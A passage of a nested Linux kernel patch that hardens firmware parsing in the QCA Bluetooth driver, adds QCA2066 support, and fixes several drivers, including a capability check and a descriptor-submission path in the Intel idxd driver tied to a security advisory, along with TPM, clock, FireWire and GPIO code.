+ 	if (!edl) {
+ 		bt_dev_err(hdev, "QCA read fw build info with no header");
+@@ -129,14 +135,25 @@ static int qca_read_fw_build_info(struct hci_dev *hdev)
+ 		goto out;
+ 	}
+ 
++	if (skb->len < sizeof(*edl) + 1) {
++		err = -EILSEQ;
++		goto out;
++	}
++
+ 	build_lbl_len = edl->data[0];
+-	if (build_lbl_len <= QCA_FW_BUILD_VER_LEN - 1) {
+-		memcpy(build_label, edl->data + 1, build_lbl_len);
+-		*(build_label + build_lbl_len) = '\0';
++
++	if (skb->len < sizeof(*edl) + 1 + build_lbl_len) {
++		err = -EILSEQ;
++		goto out;
+ 	}
+ 
++	build_label = kstrndup(&edl->data[1], build_lbl_len, GFP_KERNEL);
++	if (!build_label)
++		goto out;
++
+ 	hci_set_fw_info(hdev, "%s", build_label);
+ 
++	kfree(build_label);
+ out:
+ 	kfree_skb(skb);
+ 	return err;
+@@ -205,6 +222,49 @@ static int qca_send_reset(struct hci_dev *hdev)
+ 	return 0;
+ }
+ 
++static int qca_read_fw_board_id(struct hci_dev *hdev, u16 *bid)
++{
++	u8 cmd;
++	struct sk_buff *skb;
++	struct edl_event_hdr *edl;
++	int err = 0;
++
++	cmd = EDL_GET_BID_REQ_CMD;
++	skb = __hci_cmd_sync_ev(hdev, EDL_PATCH_CMD_OPCODE, EDL_PATCH_CMD_LEN,
++				&cmd, 0, HCI_INIT_TIMEOUT);
++	if (IS_ERR(skb)) {
++		err = PTR_ERR(skb);
++		bt_dev_err(hdev, "Reading QCA board ID failed (%d)", err);
++		return err;
++	}
++
++	edl = skb_pull_data(skb, sizeof(*edl));
++	if (!edl) {
++		bt_dev_err(hdev, "QCA read board ID with no header");
++		err = -EILSEQ;
++		goto out;
++	}
++
++	if (edl->cresp != EDL_CMD_REQ_RES_EVT ||
++	    edl->rtype != EDL_GET_BID_REQ_CMD) {
++		bt_dev_err(hdev, "QCA Wrong packet: %d %d", edl->cresp, edl->rtype);
++		err = -EIO;
++		goto out;
++	}
++
++	if (skb->len < 3) {
++		err = -EILSEQ;
++		goto out;
++	}
++
++	*bid = (edl->data[1] << 8) + edl->data[2];
++	bt_dev_dbg(hdev, "%s: bid = %x", __func__, *bid);
++
++out:
++	kfree_skb(skb);
++	return err;
++}
++
+ int qca_send_pre_shutdown_cmd(struct hci_dev *hdev)
+ {
+ 	struct sk_buff *skb;
+@@ -227,9 +287,10 @@ int qca_send_pre_shutdown_cmd(struct hci_dev *hdev)
+ }
+ EXPORT_SYMBOL_GPL(qca_send_pre_shutdown_cmd);
+ 
+-static void qca_tlv_check_data(struct hci_dev *hdev,
++static int qca_tlv_check_data(struct hci_dev *hdev,
+ 			       struct qca_fw_config *config,
+-		u8 *fw_data, enum qca_btsoc_type soc_type)
++			       u8 *fw_data, size_t fw_size,
++			       enum qca_btsoc_type soc_type)
+ {
+ 	const u8 *data;
+ 	u32 type_len;
+@@ -239,12 +300,16 @@ static void qca_tlv_check_data(struct hci_dev *hdev,
+ 	struct tlv_type_patch *tlv_patch;
+ 	struct tlv_type_nvm *tlv_nvm;
+ 	uint8_t nvm_baud_rate = config->user_baud_rate;
++	u8 type;
+ 
+ 	config->dnld_mode = QCA_SKIP_EVT_NONE;
+ 	config->dnld_type = QCA_SKIP_EVT_NONE;
+ 
+ 	switch (config->type) {
+ 	case ELF_TYPE_PATCH:
++		if (fw_size < 7)
++			return -EINVAL;
++
+ 		config->dnld_mode = QCA_SKIP_EVT_VSE_CC;
+ 		config->dnld_type = QCA_SKIP_EVT_VSE_CC;
+ 
+@@ -253,6 +318,9 @@ static void qca_tlv_check_data(struct hci_dev *hdev,
+ 		bt_dev_dbg(hdev, "File version      : 0x%x", fw_data[6]);
+ 		break;
+ 	case TLV_TYPE_PATCH:
++		if (fw_size < sizeof(struct tlv_type_hdr) + sizeof(struct tlv_type_patch))
++			return -EINVAL;
++
+ 		tlv = (struct tlv_type_hdr *)fw_data;
+ 		type_len = le32_to_cpu(tlv->type_len);
+ 		tlv_patch = (struct tlv_type_patch *)tlv->data;
+@@ -292,25 +360,56 @@ static void qca_tlv_check_data(struct hci_dev *hdev,
+ 		break;
+ 
+ 	case TLV_TYPE_NVM:
++		if (fw_size < sizeof(struct tlv_type_hdr))
++			return -EINVAL;
++
+ 		tlv = (struct tlv_type_hdr *)fw_data;
+ 
+ 		type_len = le32_to_cpu(tlv->type_len);
+-		length = (type_len >> 8) & 0x00ffffff;
++		length = type_len >> 8;
++		type = type_len & 0xff;
+ 
+-		BT_DBG("TLV Type\t\t : 0x%x", type_len & 0x000000ff);
++		/* Some NVM files have more than one set of tags, only parse
++		 * the first set when it has type 2 for now. When there is
++		 * more than one set there is an enclosing header of type 4.
++		 */
++		if (type == 4) {
++			if (fw_size < 2 * sizeof(struct tlv_type_hdr))
++				return -EINVAL;
++
++			tlv++;
++
++			type_len = le32_to_cpu(tlv->type_len);
++			length = type_len >> 8;
++			type = type_len & 0xff;
++		}
++
++		BT_DBG("TLV Type\t\t : 0x%x", type);
+ 		BT_DBG("Length\t\t : %d bytes", length);
+ 
++		if (type != 2)
++			break;
++
++		if (fw_size < length + (tlv->data - fw_data))
++			return -EINVAL;
++
+ 		idx = 0;
+ 		data = tlv->data;
+-		while (idx < length) {
++		while (idx < length - sizeof(struct tlv_type_nvm)) {
+ 			tlv_nvm = (struct tlv_type_nvm *)(data + idx);
+ 
+ 			tag_id = le16_to_cpu(tlv_nvm->tag_id);
+ 			tag_len = le16_to_cpu(tlv_nvm->tag_len);
+ 
++			if (length < idx + sizeof(struct tlv_type_nvm) + tag_len)
++				return -EINVAL;
++
+ 			/* Update NVM tags as needed */
+ 			switch (tag_id) {
+ 			case EDL_TAG_ID_HCI:
++				if (tag_len < 3)
++					return -EINVAL;
++
+ 				/* HCI transport layer parameters
+ 				 * enabling software inband sleep
+ 				 * onto controller side.
+@@ -326,6 +425,9 @@ static void qca_tlv_check_data(struct hci_dev *hdev,
+ 				break;
+ 
+ 			case EDL_TAG_ID_DEEP_SLEEP:
++				if (tag_len < 1)
++					return -EINVAL;
++
+ 				/* Sleep enable mask
+ 				 * enabling deep sleep feature on controller.
+ 				 */
+@@ -334,14 +436,16 @@ static void qca_tlv_check_data(struct hci_dev *hdev,
+ 				break;
+ 			}
+ 
+-			idx += (sizeof(u16) + sizeof(u16) + 8 + tag_len);
++			idx += sizeof(struct tlv_type_nvm) + tag_len;
+ 		}
+ 		break;
+ 
+ 	default:
+ 		BT_ERR("Unknown TLV type %d", config->type);
+-		break;
++		return -EINVAL;
+ 	}
++
++	return 0;
+ }
+ 
+ static int qca_tlv_send_segment(struct hci_dev *hdev, int seg_size,
+@@ -491,7 +595,9 @@ static int qca_download_firmware(struct hci_dev *hdev,
+ 	memcpy(data, fw->data, size);
+ 	release_firmware(fw);
+ 
+-	qca_tlv_check_data(hdev, config, data, soc_type);
++	ret = qca_tlv_check_data(hdev, config, data, size, soc_type);
++	if (ret)
++		goto out;
+ 
+ 	segment = data;
+ 	remain = size;
+@@ -574,6 +680,23 @@ int qca_set_bdaddr_rome(struct hci_dev *hdev, const bdaddr_t *bdaddr)
+ }
+ EXPORT_SYMBOL_GPL(qca_set_bdaddr_rome);
+ 
++static void qca_generate_hsp_nvm_name(char *fwname, size_t max_size,
++		struct qca_btsoc_version ver, u8 rom_ver, u16 bid)
++{
++	const char *variant;
++
++	/* hsp gf chip */
++	if ((le32_to_cpu(ver.soc_id) & QCA_HSP_GF_SOC_MASK) == QCA_HSP_GF_SOC_ID)
++		variant = "g";
++	else
++		variant = "";
++
++	if (bid == 0x0)
++		snprintf(fwname, max_size, "qca/hpnv%02x%s.bin", rom_ver, variant);
++	else
++		snprintf(fwname, max_size, "qca/hpnv%02x%s.%x", rom_ver, variant, bid);
++}
++
+ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 		   enum qca_btsoc_type soc_type, struct qca_btsoc_version ver,
+ 		   const char *firmware_name)
+@@ -582,6 +705,7 @@ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 	int err;
+ 	u8 rom_ver = 0;
+ 	u32 soc_ver;
++	u16 boardid = 0;
+ 
+ 	bt_dev_dbg(hdev, "QCA setup on UART");
+ 
+@@ -615,6 +739,10 @@ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 		snprintf(config.fwname, sizeof(config.fwname),
+ 			 "qca/apbtfw%02x.tlv", rom_ver);
+ 		break;
++	case QCA_QCA2066:
++		snprintf(config.fwname, sizeof(config.fwname),
++			 "qca/hpbtfw%02x.tlv", rom_ver);
++		break;
+ 	case QCA_QCA6390:
+ 		snprintf(config.fwname, sizeof(config.fwname),
+ 			 "qca/htbtfw%02x.tlv", rom_ver);
+@@ -649,6 +777,9 @@ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 	/* Give the controller some time to get ready to receive the NVM */
+ 	msleep(10);
+ 
++	if (soc_type == QCA_QCA2066)
++		qca_read_fw_board_id(hdev, &boardid);
++
+ 	/* Download NVM configuration */
+ 	config.type = TLV_TYPE_NVM;
+ 	if (firmware_name) {
+@@ -671,6 +802,10 @@ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 			snprintf(config.fwname, sizeof(config.fwname),
+ 				 "qca/apnv%02x.bin", rom_ver);
+ 			break;
++		case QCA_QCA2066:
++			qca_generate_hsp_nvm_name(config.fwname,
++				sizeof(config.fwname), ver, rom_ver, boardid);
++			break;
+ 		case QCA_QCA6390:
+ 			snprintf(config.fwname, sizeof(config.fwname),
+ 				 "qca/htnv%02x.bin", rom_ver);
+@@ -702,6 +837,7 @@ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 
+ 	switch (soc_type) {
+ 	case QCA_WCN3991:
++	case QCA_QCA2066:
+ 	case QCA_QCA6390:
+ 	case QCA_WCN6750:
+ 	case QCA_WCN6855:
+diff --git a/drivers/bluetooth/btqca.h b/drivers/bluetooth/btqca.h
+index 03bff5c0059de..38e2fbc950248 100644
+--- a/drivers/bluetooth/btqca.h
++++ b/drivers/bluetooth/btqca.h
+@@ -12,6 +12,7 @@
+ #define EDL_PATCH_VER_REQ_CMD		(0x19)
+ #define EDL_PATCH_TLV_REQ_CMD		(0x1E)
+ #define EDL_GET_BUILD_INFO_CMD		(0x20)
++#define EDL_GET_BID_REQ_CMD			(0x23)
+ #define EDL_NVM_ACCESS_SET_REQ_CMD	(0x01)
+ #define EDL_PATCH_CONFIG_CMD		(0x28)
+ #define MAX_SIZE_PER_TLV_SEGMENT	(243)
+@@ -46,8 +47,8 @@
+ #define get_soc_ver(soc_id, rom_ver)	\
+ 	((le32_to_cpu(soc_id) << 16) | (le16_to_cpu(rom_ver)))
+ 
+-#define QCA_FW_BUILD_VER_LEN		255
+-
++#define QCA_HSP_GF_SOC_ID			0x1200
++#define QCA_HSP_GF_SOC_MASK			0x0000ff00
+ 
+ enum qca_baudrate {
+ 	QCA_BAUDRATE_115200 	= 0,
+@@ -146,6 +147,7 @@ enum qca_btsoc_type {
+ 	QCA_WCN3990,
+ 	QCA_WCN3998,
+ 	QCA_WCN3991,
++	QCA_QCA2066,
+ 	QCA_QCA6390,
+ 	QCA_WCN6750,
+ 	QCA_WCN6855,
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index 179278b801eb3..a0e2b5d992695 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -1808,6 +1808,10 @@ static int qca_setup(struct hci_uart *hu)
+ 	set_bit(HCI_QUIRK_SIMULTANEOUS_DISCOVERY, &hdev->quirks);
+ 
+ 	switch (soc_type) {
++	case QCA_QCA2066:
++		soc_name = "qca2066";
++		break;
++
+ 	case QCA_WCN3988:
+ 	case QCA_WCN3990:
+ 	case QCA_WCN3991:
+@@ -2000,6 +2004,11 @@ static const struct qca_device_data qca_soc_data_wcn3998 __maybe_unused = {
+ 	.num_vregs = 4,
+ };
+ 
++static const struct qca_device_data qca_soc_data_qca2066 __maybe_unused = {
++	.soc_type = QCA_QCA2066,
++	.num_vregs = 0,
++};
++
+ static const struct qca_device_data qca_soc_data_qca6390 __maybe_unused = {
+ 	.soc_type = QCA_QCA6390,
+ 	.num_vregs = 0,
+@@ -2539,6 +2548,7 @@ static SIMPLE_DEV_PM_OPS(qca_pm_ops, qca_suspend, qca_resume);
+ 
+ #ifdef CONFIG_OF
+ static const struct of_device_id qca_bluetooth_of_match[] = {
++	{ .compatible = "qcom,qca2066-bt", .data = &qca_soc_data_qca2066},
+ 	{ .compatible = "qcom,qca6174-bt" },
+ 	{ .compatible = "qcom,qca6390-bt", .data = &qca_soc_data_qca6390},
+ 	{ .compatible = "qcom,qca9377-bt" },
+@@ -2556,6 +2566,7 @@ MODULE_DEVICE_TABLE(of, qca_bluetooth_of_match);
+ 
+ #ifdef CONFIG_ACPI
+ static const struct acpi_device_id qca_bluetooth_acpi_match[] = {
++	{ "QCOM2066", (kernel_ulong_t)&qca_soc_data_qca2066 },
+ 	{ "QCOM6390", (kernel_ulong_t)&qca_soc_data_qca6390 },
+ 	{ "DLA16390", (kernel_ulong_t)&qca_soc_data_qca6390 },
+ 	{ "DLB16390", (kernel_ulong_t)&qca_soc_data_qca6390 },
+diff --git a/drivers/char/tpm/tpm-dev-common.c b/drivers/char/tpm/tpm-dev-common.c
+index dc4c0a0a51290..30b4c288c1bbc 100644
+--- a/drivers/char/tpm/tpm-dev-common.c
++++ b/drivers/char/tpm/tpm-dev-common.c
+@@ -155,7 +155,7 @@ ssize_t tpm_common_read(struct file *file, char __user *buf,
+ out:
+ 	if (!priv->response_length) {
+ 		*off = 0;
+-		del_singleshot_timer_sync(&priv->user_read_timer);
++		del_timer_sync(&priv->user_read_timer);
+ 		flush_work(&priv->timeout_work);
+ 	}
+ 	mutex_unlock(&priv->buffer_mutex);
+@@ -262,7 +262,7 @@ __poll_t tpm_common_poll(struct file *file, poll_table *wait)
+ void tpm_common_release(struct file *file, struct file_priv *priv)
+ {
+ 	flush_work(&priv->async_work);
+-	del_singleshot_timer_sync(&priv->user_read_timer);
++	del_timer_sync(&priv->user_read_timer);
+ 	flush_work(&priv->timeout_work);
+ 	file->private_data = NULL;
+ 	priv->response_length = 0;
+diff --git a/drivers/clk/clk.c b/drivers/clk/clk.c
+index fe1d45eac837c..8ecbb8f494655 100644
+--- a/drivers/clk/clk.c
++++ b/drivers/clk/clk.c
+@@ -4435,7 +4435,8 @@ void clk_unregister(struct clk *clk)
+ 	if (ops == &clk_nodrv_ops) {
+ 		pr_err("%s: unregistered clock: %s\n", __func__,
+ 		       clk->core->name);
+-		goto unlock;
++		clk_prepare_unlock();
++		return;
+ 	}
+ 	/*
+ 	 * Assign empty clock ops for consumers that might still hold
+@@ -4469,11 +4470,10 @@ void clk_unregister(struct clk *clk)
+ 	if (clk->core->protect_count)
+ 		pr_warn("%s: unregistering protected clock: %s\n",
+ 					__func__, clk->core->name);
++	clk_prepare_unlock();
+ 
+ 	kref_put(&clk->core->ref, __clk_release);
+ 	free_clk(clk);
+-unlock:
+-	clk_prepare_unlock();
+ }
+ EXPORT_SYMBOL_GPL(clk_unregister);
+ 
+@@ -4632,13 +4632,11 @@ void __clk_put(struct clk *clk)
+ 	if (clk->min_rate > 0 || clk->max_rate < ULONG_MAX)
+ 		clk_set_rate_range_nolock(clk, 0, ULONG_MAX);
+ 
+-	owner = clk->core->owner;
+-	kref_put(&clk->core->ref, __clk_release);
+-
+ 	clk_prepare_unlock();
+ 
++	owner = clk->core->owner;
++	kref_put(&clk->core->ref, __clk_release);
+ 	module_put(owner);
+-
+ 	free_clk(clk);
+ }
+ 
+diff --git a/drivers/clk/sunxi-ng/ccu-sun50i-h6.c b/drivers/clk/sunxi-ng/ccu-sun50i-h6.c
+index 42568c6161814..892df807275c8 100644
+--- a/drivers/clk/sunxi-ng/ccu-sun50i-h6.c
++++ b/drivers/clk/sunxi-ng/ccu-sun50i-h6.c
+@@ -1181,11 +1181,18 @@ static const u32 usb2_clk_regs[] = {
+ 	SUN50I_H6_USB3_CLK_REG,
+ };
+ 
++static struct ccu_mux_nb sun50i_h6_cpu_nb = {
++	.common		= &cpux_clk.common,
++	.cm		= &cpux_clk.mux,
++	.delay_us       = 1,
++	.bypass_index   = 0, /* index of 24 MHz oscillator */
++};
++
+ static int sun50i_h6_ccu_probe(struct platform_device *pdev)
+ {
+ 	void __iomem *reg;
++	int i, ret;
+ 	u32 val;
+-	int i;
+ 
+ 	reg = devm_platform_ioremap_resource(pdev, 0);
+ 	if (IS_ERR(reg))
+@@ -1252,7 +1259,15 @@ static int sun50i_h6_ccu_probe(struct platform_device *pdev)
+ 	val |= BIT(24);
+ 	writel(val, reg + SUN50I_H6_HDMI_CEC_CLK_REG);
+ 
+-	return devm_sunxi_ccu_probe(&pdev->dev, reg, &sun50i_h6_ccu_desc);
++	ret = devm_sunxi_ccu_probe(&pdev->dev, reg, &sun50i_h6_ccu_desc);
++	if (ret)
++		return ret;
++
++	/* Reparent CPU during PLL CPUX rate changes */
++	ccu_mux_notifier_register(pll_cpux_clk.common.hw.clk,
++				  &sun50i_h6_cpu_nb);
++
++	return 0;
+ }
+ 
+ static const struct of_device_id sun50i_h6_ccu_ids[] = {
+diff --git a/drivers/dma/idxd/cdev.c b/drivers/dma/idxd/cdev.c
+index a9b96b18772f3..9f8adb7013eba 100644
+--- a/drivers/dma/idxd/cdev.c
++++ b/drivers/dma/idxd/cdev.c
+@@ -198,6 +198,18 @@ static int idxd_cdev_mmap(struct file *filp, struct vm_area_struct *vma)
+ 	int rc;
+ 
+ 	dev_dbg(&pdev->dev, "%s called\n", __func__);
++
++	/*
++	 * Due to an erratum in some of the devices supported by the driver,
++	 * direct user submission to the device can be unsafe.
++	 * (See the INTEL-SA-01084 security advisory)
++	 *
++	 * For the devices that exhibit this behavior, require that the user
++	 * has the CAP_SYS_RAWIO capability.
++	 */
++	if (!idxd->user_submission_safe && !capable(CAP_SYS_RAWIO))
++		return -EPERM;
++
+ 	rc = check_vma(wq, vma, __func__);
+ 	if (rc < 0)
+ 		return rc;
+@@ -212,6 +224,70 @@ static int idxd_cdev_mmap(struct file *filp, struct vm_area_struct *vma)
+ 			vma->vm_page_prot);
+ }
+ 
++static int idxd_submit_user_descriptor(struct idxd_user_context *ctx,
++				       struct dsa_hw_desc __user *udesc)
++{
++	struct idxd_wq *wq = ctx->wq;
++	struct idxd_dev *idxd_dev = &wq->idxd->idxd_dev;
++	const uint64_t comp_addr_align = is_dsa_dev(idxd_dev) ? 0x20 : 0x40;
++	void __iomem *portal = idxd_wq_portal_addr(wq);
++	struct dsa_hw_desc descriptor __aligned(64);
++	int rc;
++
++	rc = copy_from_user(&descriptor, udesc, sizeof(descriptor));
++	if (rc)
++		return -EFAULT;
++
++	/*
++	 * DSA devices are capable of indirect ("batch") command submission.
++	 * On devices where direct user submissions are not safe, we cannot
++	 * allow this since there is no good way for us to verify these
++	 * indirect commands.
++	 */
++	if (is_dsa_dev(idxd_dev) && descriptor.opcode == DSA_OPCODE_BATCH &&
++		!wq->idxd->user_submission_safe)
++		return -EINVAL;
++	/*
++	 * As per the programming specification, the completion address must be
++	 * aligned to 32 or 64 bytes. If this is violated the hardware
++	 * engine can get very confused (security issue).
++	 */
++	if (!IS_ALIGNED(descriptor.completion_addr, comp_addr_align))
++		return -EINVAL;
++
++	if (wq_dedicated(wq))
++		iosubmit_cmds512(portal, &descriptor, 1);
++	else {
++		descriptor.priv = 0;
++		descriptor.pasid = ctx->pasid;
++		rc = idxd_enqcmds(wq, portal, &descriptor);
++		if (rc < 0)
++			return rc;
++	}
++
++	return 0;
++}
++
++static ssize_t idxd_cdev_write(struct file *filp, const char __user *buf, size_t len,
++			       loff_t *unused)
++{
++	struct dsa_hw_desc __user *udesc = (struct dsa_hw_desc __user *)buf;
++	struct idxd_user_context *ctx = filp->private_data;
++	ssize_t written = 0;
++	int i;
++
++	for (i = 0; i < len/sizeof(struct dsa_hw_desc); i++) {
++		int rc = idxd_submit_user_descriptor(ctx, udesc + i);
++
++		if (rc)
++			return written ? written : rc;
++
++		written += sizeof(struct dsa_hw_desc);
++	}
++
++	return written;
++}
++
+ static __poll_t idxd_cdev_poll(struct file *filp,
+ 			       struct poll_table_struct *wait)
+ {
+@@ -234,6 +310,7 @@ static const struct file_operations idxd_cdev_fops = {
+ 	.open = idxd_cdev_open,
+ 	.release = idxd_cdev_release,
+ 	.mmap = idxd_cdev_mmap,
++	.write = idxd_cdev_write,
+ 	.poll = idxd_cdev_poll,
+ };
+ 
+diff --git a/drivers/dma/idxd/idxd.h b/drivers/dma/idxd/idxd.h
+index 7ced8d283d98b..14c6ef987fede 100644
+--- a/drivers/dma/idxd/idxd.h
++++ b/drivers/dma/idxd/idxd.h
+@@ -258,6 +258,7 @@ struct idxd_driver_data {
+ 	struct device_type *dev_type;
+ 	int compl_size;
+ 	int align;
++	bool user_submission_safe;
+ };
+ 
+ struct idxd_device {
+@@ -316,6 +317,8 @@ struct idxd_device {
+ 	struct idxd_pmu *idxd_pmu;
+ 
+ 	unsigned long *opcap_bmap;
++
++	bool user_submission_safe;
+ };
+ 
+ /* IDXD software descriptor */
+diff --git a/drivers/dma/idxd/init.c b/drivers/dma/idxd/init.c
+index e0f49545d89ff..30193195c8133 100644
+--- a/drivers/dma/idxd/init.c
++++ b/drivers/dma/idxd/init.c
+@@ -48,6 +48,7 @@ static struct idxd_driver_data idxd_driver_data[] = {
+ 		.compl_size = sizeof(struct dsa_completion_record),
+ 		.align = 32,
+ 		.dev_type = &dsa_device_type,
++		.user_submission_safe = false, /* See INTEL-SA-01084 security advisory */
+ 	},
+ 	[IDXD_TYPE_IAX] = {
+ 		.name_prefix = "iax",
+@@ -55,6 +56,7 @@ static struct idxd_driver_data idxd_driver_data[] = {
+ 		.compl_size = sizeof(struct iax_completion_record),
+ 		.align = 64,
+ 		.dev_type = &iax_device_type,
++		.user_submission_safe = false, /* See INTEL-SA-01084 security advisory */
+ 	},
+ };
+ 
+@@ -663,6 +665,8 @@ static int idxd_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	dev_info(&pdev->dev, "Intel(R) Accelerator Device (v%x)\n",
+ 		 idxd->hw.version);
+ 
++	idxd->user_submission_safe = data->user_submission_safe;
++
+ 	return 0;
+ 
+  err_dev_register:
+diff --git a/drivers/dma/idxd/registers.h b/drivers/dma/idxd/registers.h
+index fe3b8d04f9db1..fdfe7930f1834 100644
+--- a/drivers/dma/idxd/registers.h
++++ b/drivers/dma/idxd/registers.h
+@@ -4,9 +4,6 @@
+ #define _IDXD_REGISTERS_H_
+ 
+ /* PCI Config */
+-#define PCI_DEVICE_ID_INTEL_DSA_SPR0	0x0b25
+-#define PCI_DEVICE_ID_INTEL_IAX_SPR0	0x0cfe
+-
+ #define DEVICE_VERSION_1		0x100
+ #define DEVICE_VERSION_2		0x200
+ 
+diff --git a/drivers/dma/idxd/sysfs.c b/drivers/dma/idxd/sysfs.c
+index 6e1e14b376e65..c811757d0f97f 100644
+--- a/drivers/dma/idxd/sysfs.c
++++ b/drivers/dma/idxd/sysfs.c
+@@ -1162,12 +1162,35 @@ static ssize_t wq_enqcmds_retries_store(struct device *dev, struct device_attrib
+ static struct device_attribute dev_attr_wq_enqcmds_retries =
+ 		__ATTR(enqcmds_retries, 0644, wq_enqcmds_retries_show, wq_enqcmds_retries_store);
+ 
++static ssize_t op_cap_show_common(struct device *dev, char *buf, unsigned long *opcap_bmap)
++{
++	ssize_t pos;
++	int i;
++
++	pos = 0;
++	for (i = IDXD_MAX_OPCAP_BITS/64 - 1; i >= 0; i--) {
++		unsigned long val = opcap_bmap[i];
++
++		/* On systems where direct user submissions are not safe, we need to clear out
++		 * the BATCH capability from the capability mask in sysfs since we cannot support
++		 * that command on such systems.
++		 */
++		if (i == DSA_OPCODE_BATCH/64 && !confdev_to_idxd(dev)->user_submission_safe)
++			clear_bit(DSA_OPCODE_BATCH % 64, &val);
++
++		pos += sysfs_emit_at(buf, pos, "%*pb", 64, &val);
++		pos += sysfs_emit_at(buf, pos, "%c", i == 0 ? '\n' : ',');
++	}
++
++	return pos;
++}
++
+ static ssize_t wq_op_config_show(struct device *dev,
+ 				 struct device_attribute *attr, char *buf)
+ {
+ 	struct idxd_wq *wq = confdev_to_wq(dev);
+ 
+-	return sysfs_emit(buf, "%*pb\n", IDXD_MAX_OPCAP_BITS, wq->opcap_bmap);
++	return op_cap_show_common(dev, buf, wq->opcap_bmap);
+ }
+ 
+ static int idxd_verify_supported_opcap(struct idxd_device *idxd, unsigned long *opmask)
+@@ -1381,7 +1404,7 @@ static ssize_t op_cap_show(struct device *dev,
+ {
+ 	struct idxd_device *idxd = confdev_to_idxd(dev);
+ 
+-	return sysfs_emit(buf, "%*pb\n", IDXD_MAX_OPCAP_BITS, idxd->opcap_bmap);
++	return op_cap_show_common(dev, buf, idxd->opcap_bmap);
+ }
+ static DEVICE_ATTR_RO(op_cap);
+ 
+diff --git a/drivers/firewire/nosy.c b/drivers/firewire/nosy.c
+index b0d671db178a8..ea31ac7ac1ca9 100644
+--- a/drivers/firewire/nosy.c
++++ b/drivers/firewire/nosy.c
+@@ -148,10 +148,12 @@ packet_buffer_get(struct client *client, char __user *data, size_t user_length)
+ 	if (atomic_read(&buffer->size) == 0)
+ 		return -ENODEV;
+ 
+-	/* FIXME: Check length <= user_length. */
++	length = buffer->head->length;
++
++	if (length > user_length)
++		return 0;
+ 
+ 	end = buffer->data + buffer->capacity;
+-	length = buffer->head->length;
+ 
+ 	if (&buffer->head->data[length] < end) {
+ 		if (copy_to_user(data, buffer->head->data, length))
+diff --git a/drivers/firewire/ohci.c b/drivers/firewire/ohci.c
+index 667ff40f39353..7d94e1cbc0ed3 100644
+--- a/drivers/firewire/ohci.c
++++ b/drivers/firewire/ohci.c
+@@ -2049,6 +2049,8 @@ static void bus_reset_work(struct work_struct *work)
+ 
+ 	ohci->generation = generation;
+ 	reg_write(ohci, OHCI1394_IntEventClear, OHCI1394_busReset);
++	if (param_debug & OHCI_PARAM_DEBUG_BUSRESETS)
++		reg_write(ohci, OHCI1394_IntMaskSet, OHCI1394_busReset);
+ 
+ 	if (ohci->quirks & QUIRK_RESET_PACKET)
+ 		ohci->request_generation = generation;
+@@ -2115,12 +2117,14 @@ static irqreturn_t irq_handler(int irq, void *data)
+ 		return IRQ_NONE;
+ 
+ 	/*
+-	 * busReset and postedWriteErr must not be cleared yet
++	 * busReset and postedWriteErr events must not be cleared yet
+ 	 * (OHCI 1.1 clauses 7.2.3.2 and 13.2.8.1)
+ 	 */
+ 	reg_write(ohci, OHCI1394_IntEventClear,
+ 		  event & ~(OHCI1394_busReset | OHCI1394_postedWriteErr));
+ 	log_irqs(ohci, event);
++	if (event & OHCI1394_busReset)
++		reg_write(ohci, OHCI1394_IntMaskClear, OHCI1394_busReset);
+ 
+ 	if (event & OHCI1394_selfIDComplete)
+ 		queue_work(selfid_workqueue, &ohci->bus_reset_work);
+diff --git a/drivers/gpio/gpio-crystalcove.c b/drivers/gpio/gpio-crystalcove.c
+index 1ee62cd58582b..25db014494a4d 100644
+--- a/drivers/gpio/gpio-crystalcove.c
++++ b/drivers/gpio/gpio-crystalcove.c
+@@ -92,7 +92,7 @@ static inline int to_reg(int gpio, enum ctrl_register reg_type)
+ 		case 0x5e:
+ 			return GPIOPANELCTL;
+ 		default:
+-			return -EOPNOTSUPP;
++			return -ENOTSUPP;
+ 		}
+ 	}
+ 
+diff --git a/drivers/gpio/gpio-wcove.c b/drivers/gpio/gpio-wcove.c
+index c18b6b47384f1..94ca9d03c0949 100644
+--- a/drivers/gpio/gpio-wcove.c
++++ b/drivers/gpio/gpio-wcove.c
+@@ -104,7 +104,7 @@ static inline int to_reg(int gpio, enum ctrl_register type)
+ 	unsigned int reg = type == CTRL_IN ? GPIO_IN_CTRL_BASE : GPIO_OUT_CTRL_BASE;
+ 
+ 	if (gpio >= WCOVE_GPIO_NUM)
+-		return -EOPNOTSUPP;
++		return -ENOTSUPP;
+ 
+ 	return reg + gpio;
+ }
+diff --git a/drivers/gpio/gpiolib-cdev.c b/drivers/gpio/gpiolib-cdev.c
+index e40c93f0960b4..97e8335716b01 100644
+--- a/drivers/gpio/gpiolib-cdev.c
++++ b/drivers/gpio/gpiolib-cdev.c
+@@ -5,6 +5,7 @@
+ #include <linux/bitmap.h>
+ #include <linux/build_bug.h>
+ #include <linux/cdev.h>
++#include <linux/cleanup.h>
+ #include <linux/compat.h>
+ #include <linux/compiler.h>
+ #include <linux/device.h>
+@@ -12,6 +13,7 @@
+ #include <linux/file.h>
+ #include <linux/gpio.h>
+ #include <linux/gpio/driver.h>
++#include <linux/hte.h>
+ #include <linux/interrupt.h>
+ #include <linux/irqreturn.h>
+ #include <linux/kernel.h>
+@@ -20,11 +22,13 @@
+ #include <linux/mutex.h>
+ #include <linux/pinctrl/consumer.h>
+ #include <linux/poll.h>
++#include <linux/rbtree.h>
++#include <linux/seq_file.h>
+ #include <linux/spinlock.h>
+ #include <linux/timekeeping.h>
+ #include <linux/uaccess.h>
+ #include <linux/workqueue.h>
+-#include <linux/hte.h>
++
+ #include <uapi/linux/gpio.h>
+ 
+ #include "gpiolib.h"
+@@ -463,6 +467,7 @@ static int linehandle_create(struct gpio_device *gdev, void __user *ip)
+ 
+ /**
+  * struct line - contains the state of a requested line
++ * @node: to store the object in supinfo_tree if supplemental
+  * @desc: the GPIO descriptor for this line.
+  * @req: the corresponding line request
+  * @irq: the interrupt triggered in response to events on this GPIO
+@@ -475,6 +480,7 @@ static int linehandle_create(struct gpio_device *gdev, void __user *ip)
